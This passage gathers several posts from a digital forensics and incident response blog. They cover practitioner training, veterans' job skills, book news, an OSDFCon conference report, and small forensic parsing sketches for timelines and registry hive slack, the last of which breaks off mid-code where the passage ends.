What constitutes "properly"? The terms "forensics" and "evidence" bring a legal perspective to the forefront in discussions on this topic, and while I fully believe that there should be one standard to which we all strive to operate, the simple fact is that business processes and requirements very often prevent us from relying on one single standard. While it would be great to be able to cleanly shut a system down and extract the hard drive(s) for acquisition, there are plenty of times we cannot do so. I've seen systems with RAID configurations shut down and the individual drives acquired, but the order of the drives and the RAID configuration itself was never documented; as such, we had all those disk images that were useless. On the other hand, I've acquired images from live systems with USB 1.0 connections by mapping a drive (an ext HDD) to another system on the network that had USB 2.0 connections.
I think we can all agree that we won't always have the perfect, isolated, "clean room-ish" setting for acquiring data or 'evidence'. Yes, it would be nice to have hard drives removed from systems, and be able to have one verified/validated method for imaging that data, but that's not always going to be the case.
Live, bare-metal systems do not have a "hard drive" for memory, and memory acquisition inherently requires the addition of software, which modifies the contents of memory itself.
I have never done mobile forensics but I'm sure that there are instances, or even just specific handsets, where an analyst cannot simply shut the handset down and acquire a complete image of the device.
I would suggest that rather than simply "collect the evidence properly", we lean toward understanding how evidence can be collected (that one size does not fit all), and that the collection process must be thoroughly documented.
2. image the hard drive
Great point with respect to collection...but what if "the hard drive" isn't the issue? What if it's memory? Or a SIM card? See my thoughts on #1.
3. verify the tool that did the imaging, and then verify the image taken
I get that the point here is the integrity of the imaging process itself, as well as maintaining and verifying the integrity of the acquired image. However, if your only option for collecting data is to acquire it from a live system, and you cannot acquire a complete copy of the data, can we agree that what is important here is (a) documentation, and (b) understanding image integrity as it applies to the process being used (and documented)?
For items 1 thru 3, can we combine them into understanding how evidence or data can be collected, techniques for doing so, and that all processes must be thoroughly documented?
4. know what sort of analysis is required even if they don't know how to do it (i.e. can form a hypothesis)
Knowing what sort of analysis is required is predicated by understanding the goals of the acquisition and analysis process. What you are attempting to achieve predicates and informs your acquisition process (i.e., what data/evidence will you seek to acquire)
5. document all their process, analysis and findings
Documentation is the key to all of this, and as such, I am of the opinion that it needs to be addressed very early in the process, as well as throughout the process.
6. can write a report and communicate that report to a technical and non-technical audience.
If you've followed the #DFIR industry for any period of time, you'll see that there are varying opinions as to how reporting should be done. I've included my thoughts as to report writing both here in this blog, as well as in one of my books (i.e., ch 9 of WFA 4/e). While the concepts and techniques for writing DFIR reports may remain fairly consistent across the industry, I know that a lot of folks have asked for templates, and those may vary based on personal preference, etc.
All of that being said, I'm in agreement with Brett, with respect to determining a basic skill set that can be used to identify a "Basic DF Practitioner". From there, one would branch off to different specialties (OS- or platform-specific), likely with different levels (i.e., MacOSX practitioner level 1, MacOSX analyst level 1, etc.)
As such, my thoughts on identifying and developing basic skills in practitioners include:
1. Basic Concepts
Some of the basic concepts for the industry (IMHO) include documentation, writing from an analytic standpoint (exercises), reviewing other's work and having your work reviewed, etc.
For a training/educational program, I'd highly recommend exercises that follow a building block approach. For example, start by having students document something that they did over the weekend; say, attending an event or going to a restaurant or movie. Have them document what they did, then share it, giving them the opportunity to begin speaking in public. Then have them trade their documentation with someone else in the class, and have that person attempt to complete the same task, based on the documentation. Then, that person reviews the "work product", providing feedback.
Another approach is to give the students a goal, or set of goals, and have them develop a plan for achieving the goals. Have them implement the plan, or trade plans such that someone else has to implement the plan. Then conduct a "lessons learned" review; what went well, what could have gone better, and what did we learn from this that we can use in the future?
This is where the building blocks start. From here, provide reading materials for with the students provide reviews, and instead of having the instructor/teacher read them all, have the students share the reviews with other students. This may be a good way to begin building the necessary foundation for the industry.
2. Understanding File Systems and Structures
This area is intended to develop an understanding of how data is maintained on storage systems, and is intended to cover the most common formats, from a high level. For example (and this is just an example):
MacOSX - HPFS, HFS+, file structures such as plists
Linux - ext3/4
Windows - NTFS, perhaps some basic file structures (OLE, Registry)
Depending on the amount of information and the depth into which the instructor/teacher can go, the above list might be trimmed down, or include Android, network packets, common database formats (i.e., SQLite), etc.
Students can then get much more technically in-depth as they progress into their areas of specialization, or into a further level as "practitioner", before they specialize.
Just a note on "specialization" - this doesn't mean that anyone is pigeon-holed into one area; rather, it refers to the training. This means that skill sets are identified, training is provided, and skills are achieved and measured such that they can be documented. In this way, someone that achieves "MacOSX analyst level 2" is known to have completed training and passed testing for a specific set of skills that they can then demonstrate. The same would true with other specialized areas.
3. Data Acquisition and Integrity
The next phase might be one in which basic techniques for data acquisition are understood. I can see this as being a fantastic area for "fam fires"; that is, opportunities for the students to get hands-on time with various techniques. Some of these, such as using write blockers, etc., should be done in the classroom, particularly at the early stages.
In this class, you could also get into memory acquisition techniques, with homework assignments to collect memory from systems using various techniques, documenting the entire process. Then students will provide their "reports" to other students to review. This provides other opportunities for evaluation, as well; for example, have a student with, say, a Mac system provide their documentation to another student with a Mac, and see if the process returns similar results.
We want to be sure that some other very important topics are not skipped, such a acquiring logs, network captures (full packet captures vs. netflow), etc. Again, this should be a high-level understanding, with familiarization exercises, and full/complete documentation.
4. Techniques of Analysis
I think that beginning this topic as part of the basic skill set is not only important, but a good segue into areas of specialization. This is a great place to reiterate the foundational concepts; determine goals, develop a plan, document throughout, and conduct a review (i.e., "lessons learned"). With some basic labs and skills development exercises, an instructor can begin including things such as how those "lessons learned" might be implemented. For example, a Yara rule, or a grep statement for parsing logs or packet captures. But again, this is high-level, so detailed/expert knowledge of writing a Yara rule or grep expression isn't required; the fact that one can learn from experiences, and share that knowledge with others should be the point.
Again, this is mostly high-level, and a great way to maximize the time might be to have students get into groups and pick or be assigned a project. The delivery of the project should include a presentation of the goals, conduct of the project, lessons learned, and a review from the other groups.
What needs to be common throughout the courses is the building block approach, with foundations being built upon and skills developed over time.
As far as skill development goes, somethings I've learned over time include:
We all learn different ways. Some learn through auditory means, others visually, and others by doing. Yes, at a young age, I sat in a classroom and heard how to put on MOPP NBC protective gear. However, I really learned by going out to the field and doing it, and I learned even more about the equipment by having to move through thick bush, wearing all of equipment, in Quantico, in July.
I once worked for a CIO who said that our analysts needed to be able to pick up a basic skill through reading books, etc., as we just could not afford to send everyone to intro-level training for everything. I thought that made perfect sense. When I got to a larger team, there were analysts who came right out and said that they could not learn something new unless they were sitting in a classroom and someone was teaching it to them. At first, I was aghast...but then I realized that what they were saying was that, during the normal work day, there were too many other things going on...booking travel, submitting expenses, performing analysis and report writing...such that they didn't feel that they had the time to learn anything. Being in a room with an instructor took them out of the day-to-day chaos, allowed them to focus on that topic, to understand, and ask questions. Well, that's the theory, anyway. ;-)
We begin learning a new skill by developing a foundational understanding, and then practicing the skill based on repeating a "recipe". Initial learning begins with imitation. In this way, we learn to follow a process, and as our understanding develops, we begin to move into asking questions. This helps us develop a further understanding of the process, from which we can then begin making decisions what new situations arise. However, developing new skills doesn't mean we relinquish old ones, so when a new situation arises, we still have to document our justification for deviation from the process.
Addendum
Some additional thoughts that I had after clicking "publish"...
First, the above "courses" could be part of an overall curriculum, and include other courses, such as programming, etc.
Second, something else that needs to be considered from the very beginning of the program is specificity of language. Things are called specific names, and this provides a means by which we can clearly communicate with other analysts, as well as non-technical people. For example, I've read malware write-ups from vendors, including MS, that state that malware will create a Registry "entry"; well, what kind of entry? A key or a value? Some folks I've worked with in the past have told me that I'm pedantic for saying this, but it makes a difference; a key is not a value, nor vice versa. They each have different structures and properties, and as such, should be referred to as what they are, correctly.
Third, to Brett's point, vendor-specific training has its place, but should not be considered foundational. In 1999, I attended EnCase v3 Intro training; during the course, I was the only person in the room who did not have a gun and a badge. The course was both taught and attended by sworn law enforcement officers. At one point during the training, the instructor briefly mentioned MD5 hashes, and then proceeded on with the material. I asked if he could go back and say a few words about what a hash was and why it was important, and in response, he offered me the honor and opportunity of doing so. My point is the same as Brett's...it's not incumbent upon a vendor to provide foundational training, but that training (and the subsequent knowledge and skills) is, indeed, foundational (or should be) to the industry.
Here is a DFRWS paper that describes a cyber forensics ontology; this is worth consideration when discussing this topic.
Tuesday, November 20, 2018
Basic Skillz
Based on some conversations I've had with Jessica Hyde and others recently (over the past month or so), I've been thinking a good bit about what constitutes basic skills in the DFIR field.
Let's narrow it down a bit more...what constitutes "basic skills" in digital forensics?
Looking back at my own experiences, particularly the military, there was a pretty clear understanding of what constitutes "basic skills". The Marines have a motto; "every Marine a rifleman", which essentially states that every Marine must know how to pick up and effectively operate a service rifle, be it the M-16 or M-4. Boot camp (for enlisted Marines) is centered around a core understanding of what it means to be a "basic Marine", and the same holds true for TBS for officers (both commissioned and warrant). From each facility, Marines head off to specialized training in their military occupational specialty (MOS).
Is something like this an effective model for DF? If so, what constitutes "basic skills"? What is the point where someone with those basic skills transitions to an area of specialty, such as, say, Windows forensics, or Mac or mobile forensics?
Thoughts?
Saturday, November 17, 2018
Veteran Skillz
I had an interesting chat with a fellow Marine vet recently which generated some thoughts regarding non-technical skills that veterans bring to bear, in any environment. This is something I've thought about before, and following the exchange, I thought it was time to put together a blog post.
Before I start, however, I want to state emphatically and be very clear that this is not an "us vs them" blog post. I'm fully aware that a lot of non-vets may have many of the same skills and experiences discussed in the post, and I'm not suggesting that they don't. More than anything, the goal of this blog post is to help vets themselves overcome at least a modicum of the "imposter syndrome" they may be feeling as they begin their transition from the military to the civilian community.
The military includes some quality technical skills training, and a great thing about the military is that they'll teach you a skill, and then make you use it. This includes the entire spectrum of jobs...machine gunner, truck driver, welder, etc. While the technical skills imparted by the military may not, for the most part, seem up to par with those in the private sector, there are a lot of soft skills that are part of military training that are not as prevalent out in the private sector.
Vets also develop some pretty significant technical skill sets, either as part of or ancillary to their roles in the military. When I was on active duty and went to graduate school, I did things outside of work like upgrade my desktop by adding a new hard drive which, back in '94, was not the most straightforward process if you've never done it before. I knew an infantry officer who showed up and had not only installed Linux on his 386 desktop computer, but had already developed a familiarity with the OS...again, not something to shake a stick at back in the mid-'90s. I developed more than a passing familiarity with OS/2 Warp. Prior to that, I had some pretty inventive enlisted Marines working for me; one developed a field expedient antenna that he called a "cobra-head", and carried it around in an old calculator pouch. Another Marine discovered a discrepancy in the "Math for Marines" MCI correspondence course exam; he wrote it up, I edited it and had him sign it, and he got the award. After all, he found it. My point is that I've spoken with a number of vets who've been reticent to take that big step out into the private sector, instead opting for a "soft" transition by working for a contractor or in LE first. I think that some of this has been due to the misconception of, "I won't measure up", but honestly, nothing could be further from the truth.
For vets, the skills you have may be more sought after than you realize. For example, if you spent some time in the military, you have some pretty significant life experiences that non-vets may not have, like living and working with a diverse team. Spent six years in the Navy, with a good bit of that on ship or on a submarine? If you spent any time in the military, you very likely spent time living in a barracks environment, and it's also very likely that you spent time having to be responsible for yourself. As such, when you're transitioning to the private sector, you've already learned a lot of the lessons that others may not yet have experienced.
One notable example that I've heard mentioned by others is being part of a team. What does this mean? One fellow vet said that he has, "...a strong sense of not being the guy that screws over my teammates." He further shared that he'll do whatever it takes to ensure that he doesn't make someone else's job tougher or needlessly burdensome.
There are also a number of little things...how often have you been on a conference call when someone spends a minute responding, but they're still on mute? Or they have some serious racket going on in the background, and they won't go on mute?
Other examples include planning and communications. Like many, I took a class on public speaking while I was in college (it was a requirement), but my real experience with direct communications to others came while I was in the military, beginning in Officer Candidate School (OCS, which is an evaluation process, not a training one). During OCS, we had an evolution called "impromptu speech", where the platoon commander gave us 15 min to prepare a 5 min speech, and we were evaluated (in front of everyone) on both the content and conduct (i.e., did we finish on time, etc.) of the "speech". Each of us got direct feedback as to such things as, did we follow instructions and stay on point, did we stay within the time limit, were we engaging, etc. We then had multiple evolutions (military speak for "periods of training") throughout the rest of OCS where we had to use those skills; briefing three other candidates on fire team movement, briefing 12 other candidates on squad movement, the Leadership Reaction Course, etc. For each evolution, we were evaluated on our ability to come up with a plan, take input and feedback, and then clearly and concisely communicate our plan to others. And when I say we were "evaluated", I mean exactly that. I still remember the feedback I received from the Captain manning the station of the Leadership Reaction Course where I was the team leader. This sort of evolution (along with performance evaluation) continued on into initial officer training (for Marines, The Basic School, or "TBS"); however, there was no intro or basic "impromptu speech" evolution, it just picked up where OCS left off. Not only were we evaluated and critiqued by senior officers, but we also received feedback from our fellow student officers.
My point is that there were experiences that developed basic skills that many of us don't really think about, but they have a pretty significant impact on your value once you transition out of the military. For enlisted folks, did you ever have to guide a new person through the wickets of "how we do things here"? Were you ever in the field somewhere and told by your squad leader that you had to give a training class to fill a block of time, and then evaluated on how you did? Were you ever in a role where you had to give or elicit feedback? You may think that these were small, meaningless experiences, but to be quite honest, they add up and put you head and shoulders above someone who has the same technical skills, but hasn't experienced those same sorts of events during their career to that point.
Like others, I've also experienced prejudice against members of the armed forces. I'm not sharing this to diminish or minimize anyone else's experiences; rather, I'm simply sharing one of my own experiences. Years ago (at the time of this writing, close to 20), I worked for a services company in VA, for which the security division was run out of the office in CA. Not long after I started, I was told that I needed to fly to the CA office to get trained up on how things were done, and that I would be there for three days. So, I flew out, and spent the first day and a half chatting with the tech writer in the office, who was also a Marine vet. That's right...after all the discussion and planning, I showed up and nothing happened. When things finally got kicked off, the Director of Security Services stated emphatically that, had I applied to the company through his office, I wouldn't have been hired, for no other reason than that I was coming from the military. Apparently, his feeling was that military folks couldn't think the way civilian security folks thought, that we're too "lock-step".
While he was saying this, he was also giving me a tour of the facilities in the local office. Part of the tour included a room that he described as a "Faraday cage". While we were in the room, with the door closed, his cell phone rang. Evidently, it was NOT someone calling him (in the "Faraday cage") to remind him that, per my resume, I had earned an MSEE degree prior to leaving the military. In fact, I knew what a "Faraday cage" was supposed to be from my undergrad schooling. So...yeah.
My point is, don't put someone on a pedestal due to some minimized sense of self-worth, or some self-inflicted sense of awe in them. After all, we all knew that Colonel or 1stSgt who really shouldn't have been in their position. Realize that there are things you do bring to the table that may not be written into the job description, or even be on the forefront of the hiring manager's mind. However, those skills that you have based simply on what you've experienced will make you an incredibly valuable asset to someone.
For the vets out there who may be feeling anxious or reticent about their impending transition...don't. Remember how you hated staying late to clean weapons, but you adjusted your attitude and focused on getting it done...and not just your weapon, but once you were finished, you went and helped someone else? Remember all those times when the trucks were late picking you and your team up, and how you developed patience because of those experiences? Remember how you also looked to those experiences, and thought about all the steps you'd take to ensure that they didn't happen on your watch, when you were in charge? Well, remember those times and those feelings while you're interviewing, and then reach out and extend a helping hand to the next vet trying to do the same thing you did.
Tuesday, October 30, 2018
More Regarding IWS
IWS has been out for a short while now, and there have been a couple of reviews posted. So far, it seems that there is some reticence toward the book, based on the form factor (size), as well as the price point. Thanks to Jessica Hyde's feedback on that subject, the publisher graciously shared the following with me:
I’m happy to pass on a discount code that Jessica and her students, and anyone else you run across, can use on our website (www.elsevier.com) for a 30% discount AND we always offer free shipping. The discount code is: FOREN318.
Hopefully, this discount code will bring more readers and DFIR analysts a step closer to the book. I think that perhaps the next step is to address the content itself. I'm very thankful to Brett Shavers for agreeing to let me share this quote from an email he sent me regarding the IWS content:
As to content, I did a once-over to get a handle of what the book is about, now on Ch 2, and so far I think this is exactly how I want every DFIR book to be written.
I added the emphasis myself. This book is something of a radical departure from my previous books, which I modeled after other books I'd seen in the genre, because that's what I thought folks wanted to see. Mention an artifact, provide a description of what the artifact may mean (depending upon the investigation), maybe a general description of how that artifact may be used, and then provide names of a couple of tools to parse the artifact. After that, move on to the next artifact, and in the end, pretty much leave it to the reader to string everything together into an "investigation". In this case, my thought process was to use images that were available online to run through an investigation, providing analysis decisions and pivot points along the way. This way, a reader could follow along, if they chose to do so.
If you get a copy of the book and have a similar reaction to what Brett shared, please let me know. If there's something that you like or don't like about the book, again, please let me know. Do this through an email, a comment here on this blog, or a blog post of your own. As illustrated by the example involving Jessica, if I know about something, I can take action and work to change it.
How It Works
When a publisher decides to go forward with a book project, they have the author submit a prospectus describing the book, the market for the book, and any challenges that may be faced in the market; in short, the publisher has the author do the market research. The prospectus is then reviewed by several folks; for the book projects I've been involved with, it's usually been three people in the industry. If the general responses are positive, the publisher will move forward with the project.
I'm sharing this with you because, in my experience, there are two things that the publisher looks at when considering a second edition; sales numbers and feedback from the first edition. As such, if you like the content of the book and your thoughts are similar to Brett's, let me know. Write a review on Amazon or on the Elsevier site, write your own blog post, or send me an email. Let me know what you think, so that I can let the publisher know, and so that I can make the changes or updates, particularly if they're consistent across several reviewers.
If you teach DFIR, and find value in the book content, but would like to see something more, or something different, let me know. As with Jessica's example, there's nothing anyone can do to take action if they don't know what you're thinking.
Sunday, October 28, 2018
Updates
Book Discount
While I was attending OSDFCon, I had a chance to (finally!) meet and speak with Jessica Hyde, a very smart and knowledgeable person, former Marine, and an all-around very nice lady. As part of the conversation, she shared with me some of her thoughts regarding IWS, which is something I sincerely hope she shares with the community. One of her comments regarding the book was that the price point put it out of reach for many of her students; I shared that with the publisher, and received the following as a response:
I’m happy to pass on a discount code that Jessica and her students, and anyone else you run across, can use on our website (www.elsevier.com) for a 30% discount AND we always offer free shipping. The discount code is: FOREN318.
What this demonstrates is that if you have a question, thought, or comment, share it. If action needs to or can be taken, someone will do so. In this case, my concern is the value of the book content to the community; Jessica graciously shared her thoughts with me, and as a result, I did what I could to try and bring the book closer to where others might have an easier time purchasing it.
So how can you share your thoughts? Write a blog post or an email. Write a review of the book, and specify what you'd like to see. What did you find good, useful or valuable about the book content, and what didn't you like? Write a review and post it to the Amazon page for the book, or to the Elsevier page; both pages provide a facility for posting a review.
Artifacts of Program Execution
Adam recently posted a very comprehensive list of artifacts indicative of program execution, in a manner similar to many other blogs and even books, including my own. A couple of take-aways from this list include:
- Things keep changing with Windows systems. Even as far back as Windows XP, there were differences in artifacts, depending upon the Service Pack. In the case of the Shim Cache data, there were differences in data available on 32-bit and 64-bit systems. More recently, artifacts have changed between updates to Windows 10.
- While Adam did a great job of listing the artifacts, something analysts need to consider is the context available from viewing multiple artifacts together, as a cluster, as you would in a timeline. For example, let's say there's an issue where when and how Defrag was executed is critical; creating a timeline using the user's UserAssist entries, the timestamps available in the Application Prefetch file, and the contents of the Task Scheduler Event Log can provide a great deal of context to the analyst (see the sketch following this list). Do not view the artifacts in isolation; seek to use an analysis methodology that allows you to see the artifacts in clusters, for context. This also helps in spotting attempts by an adversary to impede analysis.
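To illustrate the idea of viewing artifacts in clusters, here is a minimal sketch in Python; the entries, timestamps, and descriptions are hypothetical placeholders for parser output, not the output of any particular tool:

import datetime as dt

# Hypothetical parsed entries: (UTC timestamp, artifact source, description)
entries = [
    (dt.datetime(2018, 10, 30, 14, 2, 11), "UserAssist", "defrag.exe - run count 3"),
    (dt.datetime(2018, 10, 30, 14, 2, 13), "Prefetch", "DEFRAG.EXE-<hash>.pf - last run"),
    (dt.datetime(2018, 10, 30, 14, 2, 10), "EVTX/TaskScheduler", "Event ID 200 - action started"),
]

# Sort on the timestamp and emit a TLN-like "epoch|source|description" line,
# so events from different artifact sources appear side by side for review.
for ts, source, desc in sorted(entries):
    epoch = int(ts.replace(tzinfo=dt.timezone.utc).timestamp())
    print(f"{epoch}|{source}|{desc}")

A full TLN line also carries host and user fields; the point here is simply that seeing the UserAssist, Prefetch, and Event Log entries next to each other provides context that no single artifact, viewed in isolation, can.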
So, take-aways...know the version of Windows you're working with because it is important, particularly when you ask questions, or seek assistance. Also, seek assistance. And don't view artifacts in isolation.
Artifacts and Evidence
A while back (6 1/2 yrs ago), I wrote about indirect and secondary artifacts, and included a discussion of the subject in WFA 3/e.
Chris Sanders recently posted some thoughts regarding evidence intention, which seemed to me to be along the same thought process. Chris differentiates intentional evidence (i.e., evidence generated to attest to an event) from unintentional evidence (i.e., evidence created as a byproduct of some non-attestation function).
Towards the end of the blog post, Chris lists six characteristics of unintentional evidence, all of which are true. To his point, not only may some unintentional evidence have multiple names, it may be called different things by the uninitiated, or those who (for whatever reason) choose to not follow convention or common practice. Consider NTFS alternate data streams, as an example. In my early days of researching this topic, I found that MS themselves referred to this artifact as both "alternate" and "multiple" data streams.
Some other things to consider, as well...yes, unintentional evidence artifacts often are quirky and have exceptions, which means they are very often misunderstood and misinterpreted. Consider the example of the Shim Cache entry from Chris's blog post; in my experience, this is perhaps the most commonly misinterpreted artifact to date, for the simple fact that the time stamps are commonly referred to as the "date of execution". Another aspect of this artifact is that it's often taken as standalone evidence, and should not be...there may be evidence of time stomping occurring prior to the file being included as a Shim Cache record.
Finally, Chris is absolutely correct that many of these artifacts have poor documentation, if they have any at all. I see this as a shortcoming of the community, not of the vendor. The simple fact is that, as a community, we're so busy pushing ahead that we aren't stopping to consider the value we're leaving behind for the community as a whole. Yes, the vendor may poorly document an artifact, or the documentation may simply be part of the source code that we cannot see, but what we're not doing as a community is documenting and sharing our findings. There've been too many instances during my years doing DFIR work in which I would share something with someone who would respond with, "oh, yeah...we've seen that before", only to have no documentation, not even a Notepad document or something scribbled on a napkin to which they can refer me. This is a loss for everyone.
Saturday, October 20, 2018
OSDFCon Trip Report
This past week I attended the 9th OSDFCon...not my 9th, as I haven't been able to make all of them. In fact, I haven't been able to make it for a couple of years. However, this return trip did not disappoint. I've always really enjoyed the format of the conference, the layout, and more importantly, the people. OSDFCon is well attended, with lots of great talks, and I always end up leaving there with much more than I showed up with.
Interestingly enough, one speaker could not make it at the last minute, and Brian simply shifted the room schedule a bit to better accommodate people. He clearly understood the nature of the business we're in, and the absent presenter suffered no apparent consequences as a result. This wasn't one of the lightning talks at the end of the day, this was one of the talks during the first half of the conference, where everyone was in the same room. It was very gracious of Brian to simply roll with it and move on.
The Talks
Unfortunately, I didn't get a chance to attend all of the talks that I wanted to see. At OSDFCon, by its very nature, you see people you haven't seen in a while, and want to catch up. Or, as is very often the case, you see people you only know from online. And then, of course, you meet people you know only from online because they decide to drop in, as a surprise.
However, I do like the format. Talk times are much shorter, which not only falls in line with my attention span, but also gets the speakers to focus a bit more, which is really great, from the perspective of the listener, as well as the speaker. I also like the lightning talks...short snippets of info that someone puts together quickly, very often focusing on the fact that they have only 5 mins, and therefore distilling it down, and boiling away the extra fluff.
My Talk
I feel my talk went pretty well, but then, there's always the bias of "it's my talk". I was pleasantly surprised when I turned around just before kicking the talk off to find the room pretty packed, with people standing in the back. I try to make things entertaining, and I don't want to put everything I'm going to say on the slides, mostly because it's not about me talking at the audience, as much as it's about us engaging. As such, there's really no point in me providing my slide pack to those who couldn't attend the presentation, because the slides are just place holders, and the real value of the presentation comes from the engagement.
In short, the purpose of my talk was that I wanted to let people know that if they're just downloading RegRipper and running the GUI, they aren't getting the full power out of the tool. I added a command line switch to rip.exe earlier this year ("rip -uP") that will run through the plugins folder, and recreate all of the default profiles (software, sam, system, ntuser, usrclass, amcache, all) based on the "hive" field in the config headers of the plugin.
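To illustrate the general idea, here is a rough sketch of the concept in Python; this is not RegRipper's actual code, and the "hive =>" pattern, file layout, and output format are all assumptions:

import re
from collections import defaultdict
from pathlib import Path

# Sketch: scan a plugins folder, pull the "hive" field from each plugin's
# config header, and group plugin names by hive; each group corresponds to
# a default profile. Illustration of the concept only.
def build_profiles(plugin_dir):
    profiles = defaultdict(list)
    hive_re = re.compile(r'hive\s*=>\s*["\']([^"\']+)["\']', re.IGNORECASE)
    for plugin in sorted(Path(plugin_dir).glob("*.pl")):
        match = hive_re.search(plugin.read_text(errors="ignore"))
        if match:
            profiles[match.group(1).lower()].append(plugin.stem)
    return profiles

for hive, plugins in build_profiles("plugins").items():
    print(f"{hive}: {', '.join(plugins)}")

The same sort of scan could be extended to pull other fields from the plugin config headers, which ties into one of the to-do items below.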
To-Do
Something that is a recurring theme of this conference is how to get folks new to the community to contribute and keep the community alive, as well as how to just get folks in the community to contribute. Well, a couple of things came out of my talk that might be of interest to someone in the community.
One way to contribute is this...someone asked if there was a way to determine for which version of Windows a plugin was written. There is a field in the %config header metadata that can be used for that purpose, but there's no overall list or table that identifies the Windows version for which a plugin was written. For example, there are two plugins that extract information about user searches from the NTUSER.DAT hive, one for XP (acmru.pl) and one for Vista+ (wordwheelquery.pl). There's really no point in running acmru.pl against an NTUSER.DAT from a Windows 7 system.
So, one project that someone might want to take on is to put together a table or spreadsheet that provides this list. Just sayin'...and I'm sure that there are other ideas as to projects or things folks can do to contribute.
For example, some talks I'd love to see are about how folks (not the authors) use the various open source tools that are available in order to solve problems. Actually, this could easily start out as a blog post, and then morph into a presentation...how did someone use an open source tool (or several tools) to solve a problem that they ran into? This might make a great "thunder talk"...10 to 15 min talks at the next OSDFCon, where the speaker shares the issue, and then how they went about solving it. Something like this has multiple benefits...it could illustrate the (or, a novel) use of the tool(s), as well as give DFIR folks who haven't spoken in front of a group before a chance to dip their toe in that pool.
Conversations
Like I said, a recurring theme of the conference is getting those in the community, even those new to the community, involved in keeping the community alive, in some capacity. Jessica said something several times that struck home with me...that it's up to those of us who've been in the community for a while to lead the way, not by telling, but by doing. Now, not everyone's going to be able to, or even want to, contribute in the same way. For example, many folks may not feel that they can contribute by writing tools, which is fine. But a way you can contribute is by using the tools and then sharing how you used them. Another way to contribute is by writing reviews of books and papers; by "writing reviews", I don't mean a table of contents, but instead something more in-depth (books and papers usually already have a table of contents).
Shout Outz
Brian Carrier, Mari DeGrazia, Jessica Hyde, Jared Greenhill, Brooke Gottlieb, Mark McKinnon/Mark McKinnon, Cory Altheide, Cem Gurkok, Thomas Millar, the entire Volatility crew, Ali Hadi, Yogesh Khatri, the PolySwarm folks...I tried to get everyone, and I apologize for anyone I may have missed!
Also, I have to give a huge THANK YOU to the Basis Tech folks who came out, the vendors who were there, and to the hotel staff for helping make this conference go off without a hitch.
Final Words
As always, OSDFCon is well-populated and well-attended. There was a slack channel established for the conference (albeit not by Brian or his team, but it was available), and the Twitter hashtag for the conference seems to have been pretty well-used.
To follow up on some of the above-mentioned conversations, many of us who've been around for a while (or more than just "a while") are also willing to do more than lead by doing. Many of us are also willing to answer questions...so ask. Some of us are also willing to mentor and help folks in a more direct and meaningful manner. Never presented before, but feel like you might want to? Some of us are willing to help in a way that goes beyond just sending an email or tweet of encouragement. Just ask.
Sunday, October 07, 2018
Updates
IWS
Folks have started receiving the copies of IWS they ordered, and folks like Joey and Mary Ellen have already posted reviews! Mary Ellen has also gone so far as to post her review to the Amazon page for the book!
Some have also pointed out that the XP image from Lance's practical is no longer available. Sorry about that, but I was simply using the image; I don't have access to, nor control over, the site itself. However, the focus of the book is the process, and choosing to use available images, I thought, would provide more value, as readers could follow along.
Addendum, 7 Oct: Thanks to the wonderful folks from the TwitterVerse who pointed out archive.org as a resource, the XP image can be found here!
Speaking of images, I got an interesting tweet the other day, asking why Windows 10 wasn't mentioned in ch. 2 of the book. The short answer is two-fold; one, because it wasn't used/addressed. For the second part of the answer, I'd refer back to a blog post I'd written two years ago when I started writing IWS, specifically the section of the post entitled "The "Ask"". Okay, I know that there's a lot going on in the TwitterVerse, and that two years is multiple lifetimes in Internet time. And I know that not everyone sees or ingests everything, and for those who do see things or tweets, if they have no relevance at the time, then "meh". I get it. I'm subject to it myself.
Okay, so, just to be clear...I'm not addressing that tweet in order to call someone out for not paying attention, or missing something. Not at all. I felt that this was a very good opportunity to provide clarity around and set expectations regarding the book, now that it's out. The longer response to the tweet question, the one that doesn't fit neatly into a tweet, is also two-fold; one, I could not find a Windows 10 image online that would have fit into that chapter. The idea at the core of writing the book was to provide a view into the analysis process, so that analysts could have something with which they could follow along.
The second part of the answer is that it's about the process; the analysis process should hold regardless of the version of Windows examined. Yes, the technical and tactical mechanics may change, but the process itself holds, or should hold. So, rather than focusing on, "wow, there's a whole section that addresses Windows XP...WTF??", I'd ask that the focus be on documenting an analysis plan, documenting case notes, and documenting what was learned from the analysis, and then rolling that right back into the analysis process. After all, the goal of the book is NOT to state that this is THE way to analyze a Windows system for malware, but to show the value of having a living, breathing, growing, documented, repeatable analysis process.
Also, I was engaged in analyzing systems impacted by NotPetya during the early summer of 2017. Another analyst on our team received several images from an impacted client, all of which were XP and 2003. So, yes, those systems are still out there and still actively being used by clients.
Books
One of the challenges of writing books is keeping people informed as to what's coming, and giving them the opportunity to have input. For example, after IWS was published, someone who follows me on social media said that they had no idea that there was a new book coming out. I wanted to take the opportunity (again) to let others know what was coming, what I'm working on, in an effort to not just set expectations, but to see if anyone has any thoughts or comments that might drive the content itself.
This new book is titled Practical Windows Investigations, and the current chapters are:
1. Core Concepts
2. How to analyze Windows Event Logs
3. How to get the most out of RegRipper
4. Malware Detection
5. How to determine data exfiltration
6. File (LNK, DOCX/DOC, PDF) Analysis
7. How to investigate lateral movement
8. How to investigate program execution
9. How to investigate user activity
10. How to correlate/associate a device with a user (USB, Bluetooth)
11. How to detect/analyze the use of anti-forensics
12. Making use of VSCs
PWI differs from IWS in that it sits about halfway between my previous books and IWS. What I mean by that is that my previous books listed artifacts, how to parse them, and their potential value during an investigation, but left it to the analyst to stitch the analysis together. IWS was more of a cradle-to-grave approach to an investigation, relying on publicly available images so that a reader could follow along, if they chose to do so. As such, IWS was somewhat restricted to what was available; PWI is intended to address some of those things that weren't available through the images used in IWS.
I'm going to leave that right there...
RegRipper Plugins
I recently released a couple of new plugins. One is "appkeys.pl", which addresses an interesting persistence mechanism, based on Adam's blog post. Oh, and there's the fact that it's been seen in the wild, too...so, yeah.
The other is "slack.pl", which extracts slack space from Registry hive cells, and parses the retrieved data for keys and values. In my own testing, I've got it parsing key and value cells, but just the structural data from those cell types; as of yet, I haven't seen a value cell, for example, that included the value data, just the name. It's there if you need it, and I hope folks find value in it.
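Just to illustrate the underlying idea (this is not the actual slack.pl code, which is a RegRipper plugin, but a minimal Python sketch based on the publicly documented hive format), the approach amounts to walking the hbin/cell structure of a raw hive file and, for allocated key ("nk") and value ("vk") cells, looking at any bytes that fall beyond the parsed record but within the cell:

import struct
import sys

def cell_slack(hive_path):
    with open(hive_path, "rb") as f:
        data = f.read()
    if data[:4] != b"regf":
        raise ValueError("not a registry hive file")
    pos = 0x1000                              # first hbin follows the 4096-byte base block
    while pos + 32 <= len(data) and data[pos:pos + 4] == b"hbin":
        hbin_size = struct.unpack_from("<I", data, pos + 8)[0]
        cell = pos + 32                       # cells start after the 32-byte hbin header
        end = pos + hbin_size
        while cell + 4 <= end:
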